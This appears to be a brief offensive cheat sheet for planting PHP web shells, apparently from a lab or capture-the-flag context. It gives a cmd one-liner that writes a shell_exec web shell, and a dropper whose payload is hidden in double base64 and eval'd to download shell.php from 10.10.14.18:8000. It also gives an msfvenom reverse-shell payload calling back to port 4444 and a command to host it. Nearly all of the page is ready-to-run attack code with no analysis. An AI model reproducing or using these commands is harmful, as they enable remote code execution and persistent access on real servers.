Skip to content

Reverse Connection - php dropper

php shell (cmd) 

echo|set /p="<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>" > shell.php

php shell (cmd) dropper 

echo|set /p="<pre><?php " >> dropper.php
echo|set /p="$url = 'http://10.10.14.18:8000/shell.php'; " >> dropper.php
echo|set /p="eval(base64_decode(base64_decode('" >> dropper.php
echo|set /p="SkdacGJHVmZibUZ0WlNBOUlHSmhjMlZ1WVcxbEtDUjFjbXdwT3dwcFppQW9abWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdWZmJtRnRaU3dnWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSkhWeWJDa3BLU0I3Q2dsbFkyaHZJQ0pHYVd4bElHUnZkMjVzYjJGa1pXUWdjM1ZqWTJWemMyWjFiR3g1SWpzS2ZTQmxiSE5sSUhzS0NXVmphRzhnSWtacGJHVWdaRzkzYm14dllXUnBibWNnWm1GcGJHVmtMaUk3Q24wPQ==" >> dropper.php
echo|set /p="'))); ?></pre>" >> dropper.php
shell 
msfvenom -p php/reverse_php LHOST=10.10.14.18 LPORT=4444 -o shell.php
python3 -m http.server 8000